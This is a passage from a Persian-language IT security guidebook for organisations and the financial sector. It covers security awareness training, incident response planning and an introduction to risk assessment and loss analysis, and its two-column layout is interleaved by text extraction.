‫ﻃــﺮﺡ ﻣﻨﺎﺳــﺐ ﺑــﺮﺍﻱ ﺣﻔــﻆ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫــﺎ ﻭ ﻛــﺎﻫﺶ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺁﻣﻮﺯﺵﺩﻳﺪﻩ ﻛﻪ ﺍﺯ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺁﮔـﺎﻩ ﺍﺳـﺖ‬


‫ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻄﻬﺎﻱ ﺩﺍﺭﺍﻱ ﻣﻌﻤﺎﺭﻱ ﺑﺎﺯ ﺑﻪ ﺣـﺴﺎﺏ ﻣـﻲﺁﻳﻨـﺪ‪.‬‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻻﻳﺔ ﻣﺆﺛﺮ ﺣﻔﺎﻇﺘﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﻴﺎﻓﺰﺍﻳﺪ‪.‬‬
‫ﺍﻳﻦ ﺳﻠﺴﻠﺔ ﺩﻭﺍﺯﺩﻩ ﻻﻳﻪﺍﻱ ﺗﻮﺿﻴﺢ ﻣﻲﺩﻫﺪ ﻛﻪ ﺩﺭ ﻫـﺮ ﺷـﺮﺍﻳﻂ‬
‫ﻛﺪﺍﻡ ﻣﻜﺎﻧﻴﺰﻡ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ؛ ﻭ ﻫﻤﭽﻨﻴﻦ‬ ‫ﺍﻗﺪﺍﻣﺎﺕ ﺍﻭﻟﻴﺔ ﺁﻣﻮﺯﺷﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬
‫ﻣﻲﮔﻮﻳﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﻫﺮ ﺷﺒﻜﻪ ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺿـﻌﻴﻔﺘﺮﻳﻦ ﻋﻨـﺼﺮ‬ ‫ﺍﻋﻢ ﺍﺯ ﻣﺪﻳﺮﺍﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ‪ -‬ﻛﻪ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ‬
‫ﺁﻥ ﺷﺒﻜﻪ ﺍﺳﺖ‪ .‬ﺟﺰﺋﻴﺎﺕ ﺍﻳﻦ ﻃـﺮﺡ ﺩﻭﺍﺯﺩﻩ ﻻﻳـﻪﺍﻱ ﺍﻣﻨﻴـﺖ ﺩﺭ‬ ‫ﺑﻪ ﻧﻈﺎﺭﺕ ﻭ ﺍﺟﺮﺍﻱ ﻗـﺎﻧﻮﻥ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ ‪ -‬ﻭ ﻫﻤﭽﻨـﻴﻦ ﺑـﺮﺍﻱ‬
‫ﺍﻧﺘﻬﺎﻱ ﻫﻤﻴﻦ ﺑﺨﺶ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬ ‫ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺍﻗـﺪﺍﻣﺎﺕ‬
‫ﺍﻭﻟﻴﻪ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻣﻲﺷﻮﻧﺪ‪:‬‬
‫ﺗﺒﺼﺮﻩﻫﺎ‬
‫ﺍﺭﺗﻘﺎﻱ ﺁﮔﺎﻫﻲ ﻭ ﺁﻣﻮﺯﺵ ﺍﻓـﺮﺍﺩ ﺑﺨـﺶ ﻣـﺎﻟﻲ ﺩﺭ ﻣـﻮﺭﺩ‬ ‫•‬
‫ﺑﺨﺶ ﺳﻮﻡ ﻭ ﭼﻬﺎﺭﻡ ﻛﺘﺎﺏ ﻣﺮﺑﻮﻁ ﺑـﻪ ﻣﺤﻴﻄﻬـﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ‬ ‫ﺍﺻﻮﻝ ﺍﺧﻼﻗﻲ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺭﻓﺘـﺎﺭ ﻣﻨﺎﺳـﺐ ﻛـﺎﺭﺑﺮ ﺩﺭ‬
‫ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺷﻜﻞﮔﻴﺮﻱ ﻣـﻲﺑﺎﺷـﻨﺪ ﻭ ﺑـﺎ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﻳـﻚ‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﺒﻜﻪﺍﻱ؛‬
‫ﺭﻭﺵ ﺿﺎﺑﻄﻪﻣﻨﺪ ﺗﻼﺵ ﺩﺍﺭﻧﺪ ﺍﻗﺘﺼﺎﺩ ﻭ ﻗﺎﻧﻮﻥ ﻭ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺑـﻪ‬
‫ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻥ‬ ‫•‬
‫ﺗﻨﺎﺳﺐ ﻳﻜﺪﻳﮕﺮ ﻫﻤﺎﻫﻨﮓ ﻛﻨﺪ‪ .‬ﺑﻪ ﻋﻠﺖ ﺭﺷـﺪ ﺳـﺮﻳﻊ ﺟﻬـﺎﻧﻲ‪،‬‬
‫ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ ﺭﻓﺘﺎﺭ ﺩﺭﺳﺖ ﻭ ﺭﺍﻫﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺑـﺮﺍﻱ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻗﺎﻟﺒﻲ ﻣﺮﻣﻮﺯ ﺩﺍﺭﺩ‪ .‬ﻏﺎﻟﺐ ﻛـﺸﻮﺭﻫﺎ ﺍﺯ ﺟﻤﻠـﻪ‬
‫ﮔﺰﺍﺭﺵ ﺣﻤﻼﺕ ﻳﺎ ﺭﺧﺪﺍﺩﻫﺎ ﺑﺎ ﻫﻤﺎﻫﻨﮕﻲ ﻛﺎﻣﻞ ﺑﺎ ﺗﻤـﺎﻡ‬
‫ﺁﻧﻬﺎ ﻛﻪ ﺗﺠﺮﺑﺔ ﺑﻴﺸﺘﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺩﺍﺭﻧـﺪ ﻫﻨـﻮﺯ ﺍﺯ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺭﺍﺳـﺘﺎﻱ ﺗﻜﻤﻴـﻞ ﺍﻃﻼﻋـﺎﺕ ﺟﻬـﺎﻧﻲ‬
‫ﺩﺍﻧﺶ ﺍﻧﺪﻛﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﻭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻧﻮﻳﻦ ﺣﺘـﻲ‬
‫ﺩﺭﺑﺎﺭﺓ ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﻧﺪ؛‬
‫ﺍﺯ ﺍﻳﻦ ﻫﻢ ﻛﻤﺘـﺮ ﻣـﻲﺩﺍﻧﻨـﺪ‪ .‬ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺗﻮﺟـﻪ ﺑﻴـﺸﺘﺮﻱ ﺑـﻪ‬
‫ﺁﻣﻮﺯﻩﻫﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺩﺍﺭﺩ؛ ﭼﺮﺍﻛـﻪ ﻣﺤـﻞ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻥ‬ ‫ﻱ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻧﻮﻳﻦ ﺩﺭﺑـﺎﺭﺓ‬
‫ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ ﻣﺠﺎﻣﻊ ﺑﺎﻧﻜﺪﺍﺭ ﹺ‬ ‫•‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﻮﺩﻩ ﻭ ﺯﻣﺎﻥ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺍﻱ ﺗﺠﺮﺑﺔ ﻣﺰﺍﻳـﺎ ﻭ ﻣﻌﺎﻳـﺐ ﺁﻥ‬ ‫‪٤٩‬‬
‫ﻧﻴﺎﺯ ﺑﻪ ﻃﺮﺣﻬﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧـﺪﺍﺩ ﺩﺭ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ‬
‫ﺩﺍﺷﺘﻪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻭﻟﻴﻪ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺭﺍ ﺑﻮﺟـﻮﺩ‬ ‫ﺣﺎﺩﺛﻪﺍﻱ ﺭﺥ ﻣﻲﺩﻫﺪ؛‬
‫ﺁﻭﺭﺩﻩ ﺍﺳﺖ‪ ٥٢.‬ﺩﺭ ﺗﺪﻭﻳﻦ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺑـﻪ ﻓﻌﺎﻟﻴــﺘﻬﺎ ﻭ ﺗﺠـﺎﺭﺏ‬
‫ﺗﺴﻬﻴﻞ ﻫﻤﻜﺎﺭﻱ ﻭ ﺍﻧﺘﻘﺎﻝ ﺩﺍﻧﺶ ﻣﻴﺎﻥ ﻣﺠﺮﻳﺎﻥ ﻗـﺎﻧﻮﻥ‪،‬‬ ‫•‬
‫ﻭﺍﺣــﺪﻫﺎﻱ ﺍﻃﻼﻋــﺎﺕ ﺧــﺪﻣﺎﺕ ﻣــﺎﻟﻲ‪ ٥٠‬ﻭ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫‪51‬‬ ‫‪Financial Stability Institute‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ‪ ARPANET‬ﺑﻮﺟﻮﺩ ﺁﻣﺪ‪ ،‬ﻛـﻪ ﺩﺭ ﺳـﺎﻝ ‪ ۱۹۶۹‬ﺑﻮﺳـﻴﻠﺔ‬ ‫‪۵۲‬‬
‫‪49‬‬ ‫‪Incident Response Plan‬‬
‫ﻥ ﭘـــﺮﻭﮊﻩﻫـــﺎﻱ ﺗﺤﻘﻴﻘـــﺎﺗﻲ ﭘﻴـــﺸﺮﻓﺘﻪ ) ‪Advanced‬‬
‫ﺳـــﺎﺯﻣﺎ ‪‬‬ ‫‪50‬‬ ‫‪Financial Intelligence Units‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٣٦‬‬

‫ﻛﺸﻮﺭﻫﺎﻱ ﭘﻴﺸﺮﻓﺘﺔ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺭ ﺍﺭﻭﭘﺎ‪ ،‬ﺁﺳﻴﺎ ﻭ ﺁﻣﺮﻳﻜﺎﻱ ﺟﻨﻮﺑﻲ‬


‫ﻧﻴﺰ ﺗﻮﺟﻪ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺑـﺪﻳﻬﻲ ﺍﺳـﺖ ﻛـﻪ ﻣﻄﺎﻟـﺐ ﺯﻳـﺎﺩﻱ ﺭﺍ‬
‫ﻣﻲﺗﻮﺍﻥ ﺩﺭﺑﺎﺭﺓ ﻣﻮﺿﻮﻋﺎﺗﻲ ﭼـﻮﻥ "ﻣـﺸﻜﻼﺕ ﻭﻳـﮋﺓ ﺑﺎﺯﺍﺭﻫـﺎﻱ‬
‫ﻧﻮﻳﻦ ﺩﺭ ﺍﻳﻦ ﻋﺮﺻﻪ"‪ ،‬ﻭ "ﺯﻣﻴﻨﻪﻫﺎﻱ ﺣﻘﻮﻗﻲ ﻭ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـﻪﻫـﺎﻱ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ"‬
‫ﻃﺮﺡ ﻛﺮﺩ‪.‬‬
‫ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻓﻌﺎﻟﻴـﻬﺎ‪ ،‬ﻧﻴﺮﻭﻱ ﺑﺎﻟﻘﻮﺓ ﻋﻈﻴﻢ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﻄﺒﻴﻖ ﺩﺍﺩﻩﺍﻧﺪ ﺑﻪ ﺷﺪﺕ ﺑﻪ ﺧﻄـﺮ‬
‫ﻣﻲﺍﻓﺘﺪ؛ ﭼﺮﺍﻛﻪ ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨـﺎﻥ ﻛـﺴﺎﻧﻴﻜﻪ ﺩﺭ ﺑـﺎﺯﺍﺭ ﻫـﺴﺘﻨﺪ‬
‫ﻱ ﺍﻳـﻦ‬
‫ﺑﻄﻮﺭ ﺟﺪﻱ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﺑﻌـﺪ ﹺ‬
‫ﺑﺨﺶ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺩﻧﺒﺎﻝ ﺷﺪﻩﺍﻧﺪ‪:‬‬
‫ﺍﻟﻒ( ﺭﻭﺷﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ؛‬
‫ﺏ( ﺭﺍﻫﻨﻤﺎﻱ ﻋﻤﻠﻲ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻛـﻪ‬
‫ﺑﺮﺍﻱ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ؛‬
‫ﺗﻮﺻﻴﻪﻫﺎﻱ ﻛﻠﻲ ﻭ ﻭﻳﮋﻩ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺩﺭﺑﺎﺭﺓ‬ ‫ﺝ(‬
‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛ ﻭ‬
‫ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ‪ ،‬ﺑﺎ ﺍﻇﻬﺎﺭ ﻧﻈﺮﻫـﺎﻳﻲ ﺍﺯ‬ ‫ﺩ(‬
‫ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺩﺭ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﺩﺭ ﻋﻤﻠﻴﺎﺕ ﺗﺠﺎﺭﻱ‪ ،‬ﺑﻮﻳﮋﻩ‬
‫ﺩﺭ ﺭﺍﺑﻄــﻪ ﺑــﺎ ﺑﺨــﺶ ﻣــﺎﻟﻲ ﻭ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ ﺗﺠــﺎﺭﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪.‬‬

‫‪ (Research Projects Agency‬ﺩﺭ ﻭﺯﺍﺭﺕ ﺩﻓــﺎﻉ ﺍﻳــﺎﻻﺕ‬


‫ﻣﺘﺤﺪﻩ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ‪.‬‬
‫‪١٣٧‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻣﺘﺼﻞ ﻣﻲﻛﻨﻨﺪ ﺍﻏﺎﺯ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﻣﺤﻴﻂ ﻛﺎﺭ‪ ،‬ﺩﺍﺩﻩﻫـﺎﻱ ﺧـﺎﻡ‬
‫ﻧﻈﻴﺮ ﺳﻮﺍﺑﻖ ﻣﺸﺘﺮﻳﺎﻥ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺮﺍﻱ ﺭﻗﺒـﺎ ﻭ‬
‫ﺗﺒﻬﻜﺎﺭﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻫﺪﺍﻓﻲ ﺍﺭﺯﺷﻤﻨﺪ ﺍﺳﺖ ﻭ ﺑﻪ ﺗﻮﺟﻪ ﺧﺎﺹ ﻧﻴﺎﺯ‬
‫‪٥٥‬‬
‫ﺩﺍﺭﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺩﺭ ﻣﺆﺳﺴﺎﺕ ﭘﻴﺸﺮﻓﺘﻪﺗﺮ ﻣﺎﻟﻜﻴﺖ ﻣﻌﻨـﻮﻱ‬
‫ﻱ ﻣﻨﺤﺼﺮ ﺑﻔـﺮﺩ‬ ‫ﻧﻈﻴﺮ ﺍﺳﻨﺎﺩ ﺗﺤﻘﻴﻘﺎﺕ ﻋﻠﻤﻲ ﻳﺎ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻛﺎﺭ ﹺ‬ ‫ﻓﺼﻞ ﺳﻮﻡ‬
‫ﻲ ﻭﻳـﮋﻩ ﻫـﺴﺘﻨﺪ‪.‬‬‫ﺍﺭﺯﺵ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ ﻭ ﻧﻴﺎﺯﻣﻨﺪ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﺩﺭ ﺩﻧﻴﺎﻳﻲ ﻛﻪ ﺭﻭﺯ ﺑﻪ ﺭﻭﺯ ﺭﻗﺎﺑﺖ ﺩﺭ ﺁﻥ ﺷﺪﺕ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﺳـﺮﻗﺖ‬
‫ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺧﺎﻡ ﻭ ﺩﺍﺭﺍﺋﻴﻬﺎﻱ ﻓﻜﺮﻱ ﺍﺯ ﻃﺮﻳﻖ ﺭﺍﻳﺎﻧﻪ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ‬
‫ﺍﺳﺖ‪ .‬ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ "ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ" ﻛﻪ ﺩﺭ ﻧﮕﺮﺵ ﻛﻠـﻲ‬ ‫ﻛﻠﻴﺎﺕ‬
‫ﻭ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﺪﻳﺮﻳﺖ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﺁﻣـﻮﺯﺵ ﻭ‬ ‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ‪ ٥٣‬ﻭ ﺗﺤﻠﻴـﻞ ﺯﻳـﺎﻥ‪ ٥٤‬ﻭ ﺁﺳـﻴﺒﻬﺎﻱ‬
‫ﻫﻮﺷﻴﺎﺭﺳﺎﺯﻱ ﻛﺎﺭﻛﻨﺎﻥ‪ ،‬ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﻔﺎﻑ ﺩﺭﻭﻥ ﺳـﺎﺯﻣﺎﻥ‪ ،‬ﺑـﻪ‬ ‫ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺗﺠﺎﺭﻱ ﺑﺮﺭﺳﻲ ﻣﻲﺷـﻮﻧﺪ؛ ‪ ،‬ﻣﻨـﺸﺄ‪ ،‬ﻋﻤﻠﻜـﺮﺩ‬
‫ﻛﺎﻫﺶ ﺧﻄﺮﺍﺕ ﻧﺎﺷـﻲ ﺍﺯ ﺗﺨﻠﻔـﺎﺕ ﺍﻣﻨﻴـﺖ ﻓﻴﺰﻳﻜـﻲ ﻭ ﺍﻣﻨﻴـﺖ‬ ‫ﻣﺤﺘﻤﻞ‪ ،‬ﻭ ﺷﺪﺕ ﺍﺛـﺮﺍﺕ ﮔـﺴﺘﺮﻩﺍﻱ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮ‬
‫ﺳﺎﻳﺒﺮ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ‪.‬‬ ‫ﻲ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺭﻭﺯﻣﺮﻩ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧـﺪ؛ ﻧﻜـﺎﺕ ﺍﺻـﻠ ﹺ‬
‫ﻳﻚ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺻﺤﻴﺢ ﺗﺸﺮﻳﺢ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺻﻮﻝ ﺍﺳﺎﺳـﻲ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺧﻮﺩ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ‬ ‫ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻭﺍﻗﻌﻲ ﻧﻴـﺰ ﻣـﻮﺭﺩ‬
‫ﺍﮔﺮﭼــﻪ ﻃﺮﺣﻬــﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﻣــﺸﺘﺮﻛﻲ ﺑــﺮﺍﻱ ﺍﻳﻤــﻦﺳــﺎﺯﻱ‬ ‫ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺳــﺎﺧﺘﻤﺎﻧﻬﺎ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺍﻣــﺎ ﺩﺍﺷــﺘﻦ‬
‫ﺗﺼﻮﻳﺮ ﻛﺎﻣﻠﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻭ ﻗﺎﻟﺐ ﻓﻌﺎﻟﻴﺖ ﺁﻥ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﻳـﻚ‬ ‫ﺗﻮﺳﻌﺔ ﻓﻨﺎﻭﺭﻱ‪ :‬ﻣﺮﺯﻫﺎﻱ ﺟﺪﻳﺪ‬
‫ﻲ ﺧﻮﺏ‪ ،‬ﻻﺯﻡ ﺍﺳﺖ‪ .‬ﻣﺠﻤﻮﻋﺔ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ‬ ‫ﻃﺮﺡ ﺍﻣﻨﻴﺘ ﹺ‬ ‫ﻛﻠﻴﺔ ﺳﺎﺯﻣﺎﻧﻬﺎ ‪ -‬ﭼﻪ ﻛﻮﭼﻚ ﻭ ﭼﻪ ﺑﺰﺭﮒ ‪ -‬ﺩﺭﺣﺎﻝ ﻓﻌﺎﻟﻴـﺖ ﺩﺭ‬
‫ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﻧﻴﺎ ﹺﺯ ﺷﺮﻛﺘﻲ ﻛﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺩﻓﻊ ﺿﺎﻳﻌﺎﺕ ﺧﻄﺮﻧـﺎﻙ‬ ‫ﻳﻚ ﻣﺤﻴﻂ ﺟﻬﺎﻧﻲ ﻫﺴﺘﻨﺪ‪ .‬ﭘﻴﺸﺮﻓﺖ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ ﺷـﺒﻜﻪﻫـﺎﻱ‬
‫ﻳﺎ ﻣﻮﺍﺩ ﺯﻳﺴﺘﻲ ﻓﻌﺎﻝ ﺍﺳﺖ ﺑﺎ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎ ﹺﺯ ﻳﻚ‬ ‫ﺣﻤﻞ ﻭ ﻧﻘﻞ ﺩﺭ ﻗـﺮﻥ ﮔﺬﺷـﺘﻪ ﻣـﺸﺘﺮﻳﺎﻥ ﻭ ﺑﺎﺯﺍﺭﻫـﺎ ﺭﺍ ﺑـﻪ ﻫـﻢ‬
‫ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻟﻮﺍﺯﻡ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﻓﺮﺁﻳﻨـﺪ‬ ‫ﻧﺰﺩﻳﻜﺘﺮ ﻛﺮﺩﻩ‪ ،‬ﻫﺰﻳﻨﻪﻫﺎ ﺭﺍ ﺑـﻪ ﺣـﺪﺍﻗﻞ ﺭﺳـﺎﻧﺪﻩ ﻭ ﺑﺎﻋـﺚ ﺷـﺪﻩ‬
‫ﻲ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﺓ ﺍﻣﻨﻴﺘﻲ ﺗﻮﺳﻂ ﻣﺪﻳﺮﻳﺖ‪ ،‬ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ‬ ‫ﺷﻨﺎﺳﺎﻳ ﹺ‬ ‫ﺍﻣﺮﻭﺯ ﺑﺘﻮﺍﻥ ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﺑﺮﺍﻱ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺑﻪ ﺗﻤﺎﻣﻲ ﻧﻘﺎﻁ ﺩﻧﻴـﺎ‬
‫ﭘﻨﺞ ﺳﺌﻮﺍﻝ ﺯﻳﺮ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪:‬‬ ‫ﺍﺭﺳﺎﻝ ﻛﺮﺩ‪ .‬ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ﻣـﺪﻳﺮﺍﻥ ﺑﺎﻳـﺪ ﮔـﺴﺘﺮﻩﺍﻱ ﺍﺯ‬
‫ﺍﺻﻠﻲﺗﺮﻳﻦ ﻣﺤﺼﻮﻝ ﻳﺎ ﺧﺪﻣﺖ ﺳـﺎﺯﻣﺎﻥ ﭼﻴـﺴﺖ؟ ﺍﮔـﺮ‬ ‫‪.۱‬‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﺮﺍﻱ ﻣﺆﺳﺴﻪﻫﺎﻳﺸﺎﻥ ﺩﺭﻧﻈـﺮ ﺑﮕﻴﺮﻧـﺪ‪ .‬ﺍﺯ ﺍﻧﺘﻬـﺎﻱ‬
